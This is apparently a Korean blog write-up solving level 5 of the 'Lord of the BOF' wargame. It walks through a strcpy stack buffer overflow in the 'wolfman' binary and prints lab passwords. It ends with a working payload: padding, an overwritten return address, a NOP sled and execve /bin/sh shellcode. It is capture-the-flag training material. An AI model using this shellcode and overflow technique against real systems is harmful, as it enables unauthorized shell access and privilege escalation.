wargame 풀이/LOB

LOB 5번 풀이 (orc)

yehey 2020. 11. 6. 00:56

 

id: orc
pw: cantata

 

/*
        The Lord of the BOF : The Fellowship of the BOF
        - wolfman
        - egghunter + buffer hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}

 

    • strcpy의 BOF 취약점 이용해서 공격
    • egghunter 코드 삽입 (환경변수를 이용한 공격 불가능)
    • bufferhunter 코드 삽입 (buffer 내에 쉘코드 삽입해도 0으로 초기화 됨, 사용 불가)
    • 전달하려는 문자열의 48번째는 "\xbf"와 같아야함 (같지 않으면 강제종료)
    • buffer에 담긴 내용 출력

 

wolfman을 디스어셈블 하면 다음과 같다.

main+185 에서 strcpy의 인자로 ebp-40의 주소를 넣어줌

main+197 에서 printf의 인자로 ebp-40의 주소를 넣어줌

main+218 에서 memset의 인자로 ebp-40의 주소를 넣어줌

=> ebp-40이 buffer의 시작주소

 

main+36 에서 ebp-44에 0을 넣어줌

=> ebp-44가 i의 주소

 

스택구조를 그려보면 다음과 같다

우리는 egghunter와 bufferhunter 때문에 buffer 공간과 환경변수는 사용할 수 없다. 그래서 쉘 코드를 저장할 다른 공간을 찾아야 한다. 우리는 buffer에서 값을 채워 ebp를 넘을 수는 있지만 buffer 보다 아래 있는 공간에는 값을 채울 수 없다.

따라서 ret 위의 공간에 NOP와 쉘 코드를 채워줄 것이다.

이전처럼 tmp 디렉토리를 만들고 wolfman을 복사해서 ret 주소를 알아내보았는데, 막상 실행해보니 segmentation fault 가 일어났다. (ret가 유효하지 않은 주소일 때 발생하는 오류라고 생각하면 된다. )

segmentation fault가 발생하는 이유로는 gdb에서 실행했을 때와 프로그램이 실제로 실행될 때 프로그램이 할당받는 메모리 주소에 차이가 발생할 수도 있다는 이유였다.

그래서 프로그램이 실제로 실행될 때 buffer 주소를 얻기 위해 기존 wolfman.c 코드를 복사, 약간의 수정을 거쳐 wolfman2.c 코드를 만들었다.

 

wolfman2.c의 코드는 다음과 같다.

/*
        wolfman2.c code
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }
        strcpy(buffer, argv[1]);
        printf("%p\n", buffer);		//buffer 값이 아닌 주소를 출력하도록 변경

        // buffer hunter
        memset(buffer, 0, 40);
}

 

위의 코드를 컴파일 후 실행해보았다. 실행할 때 조건은 기존 wolfman과 같다. 44바이트를 임의로 채워주고 48번째가 "\xbf"여야하기 때문에 45번째 부터 "\xbf"로 채워주었다. ret 뒤에는 쉘 코드도 넣어주었으나 현재 단계에서는 사실 필요없음.

(payload 와 비슷하게 만들기 위해 붙임) 

 

인자를 전달해주고 실행했더니 0xbffffa60 이라는 주소가 출력되었다. 이는 buffer의 시작주소다!

우리가 ret에 넣어야하는 주소는 buffer에서 48바이트 떨어진 buffer+49 의 주소이다! 

0xbffffa60+0x31 = 0xbffffa91 이 ret 위의 주소를 가리킨다.

따라서 ret에 0xbffffa91을 넣어주면 쉘 코드가 실행될 것이다. 

 

이제 wolfman을 공격해보자! 

44바이트를 의미없는 값으로 채워주고, ret에는 ret 바로 위의 주소를 넣어주고 ret 위에는 NOP와 쉘 코드를 넣어주자

payload: ./wolfman `python -c 'print "a"*44+"\x91\xfa\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

(혹시 몰라 NOP를 100바이트 정도 채우고 쉘 코드를 넣어주었다. NOP slide를 위해)

 

bash 쉘이 정상적으로 띄워졌고, wolfman의 권한을 얻어 password를 얻을 수 있었다.

 

wolfman의 pw: "love eyuna"